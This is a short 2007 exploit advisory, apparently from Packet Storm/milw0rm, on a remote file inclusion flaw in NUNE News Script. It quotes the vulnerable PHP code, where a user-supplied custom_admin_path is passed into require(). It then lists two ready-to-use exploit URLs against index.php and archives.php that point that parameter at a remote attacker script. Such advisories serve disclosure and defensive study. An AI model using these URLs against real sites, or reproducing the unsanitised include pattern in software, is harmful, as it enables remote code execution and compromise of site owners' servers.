nunenews-rfi.txt

2007-01-13T00:00:00
ID PACKETSTORM:53534
Type packetstorm
Reporter XORON
Modified 2007-01-13T00:00:00

Description

                                        
                                            `-----------------------------------------------  
  
NUNE News Script (custom_admin_path) Remote File Include Vulnerablity  
  
-----------------------------------------------  
  
Author: xoron  
  
-----------------------------------------------  
  
Code:  
  
if (isset($custom_admin_path))  
$special_admin_path = $custom_admin_path;  
  
else  
$special_admin_path = "news/admin";  
  
require("$special_admin_path/config/nune.conf.php");  
  
-----------------------------------------------  
  
3xplo!t:  
  
www.target.com/[script]/index.php?custom_admin_path=http://evilscript?  
www.target.com/[script]/archives.php?custom_admin_path=http://evilscript?  
  
-----------------------------------------------  
  
download: http://download.sourceforge.net/nune/nune-2.0pre2.tar.gz  
  
-----------------------------------------------  
  
Greetz: str0ke, kacper, GODAttach  
  
nukedx'e elveda, kendine iyi bak dostum..!  
  
-----------------------------------------------  
  
# milw0rm.com [2007-01-06]  
`